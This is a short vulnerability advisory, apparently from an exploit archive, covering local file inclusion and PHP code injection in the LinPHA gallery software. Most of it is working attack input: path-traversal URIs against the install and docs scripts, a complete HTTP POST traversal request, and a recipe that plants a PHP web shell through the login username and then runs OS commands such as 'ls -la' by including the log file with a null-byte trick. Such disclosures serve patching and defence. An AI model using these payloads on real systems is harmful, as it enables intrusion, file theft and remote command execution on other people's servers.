|
|
LinPHA Multiple Local File Inclusion and PHP Code Injection Vulnerabilities
The following URI examples were provided for the file inclusion issues: http://www.example.com/[host]/docs/index.php?lang=/../../../../../../../../../../test http://www.example.com/[path]/install/install.php?language=/../../../../../../../test http://www.example.com/[path]/install/sec_stage_install.php?whatlang=1&language=/../../../../../../../testhttp://[target]/[path]/install/sec_stage_install.php?language=/../../../../../../../test The following HTTP POST example was provided for the file inclusion issues: POST [path]install/forth_stage_install.php HTTP/1.1\r\n"; Host: [somehost] Content-Type: application/x-www-form-urlencoded Content-Length: [data_length] User-Agent: GameBoy, Powered by Nintendo Connection: Close language=/../../../../../../../../test The file inclusion issues may allow for other system files to be retrieved if the 'magic_quotes_gpc' PHP directive is set to off. The following steps were provided to exploit the PHP code injection issues: 1. Login with username: <?php system($_GET[cmd]);?> and password: [whatever] If the 'magic_quotes_gpc' is set to off, it is possible to launch operating system commands through the following request: http://www.example.com/[path]/docs/index.php?cmd=ls%20-la&lang=/../../sql/tmp/linpha.log%00 |
|
Privacy Statement |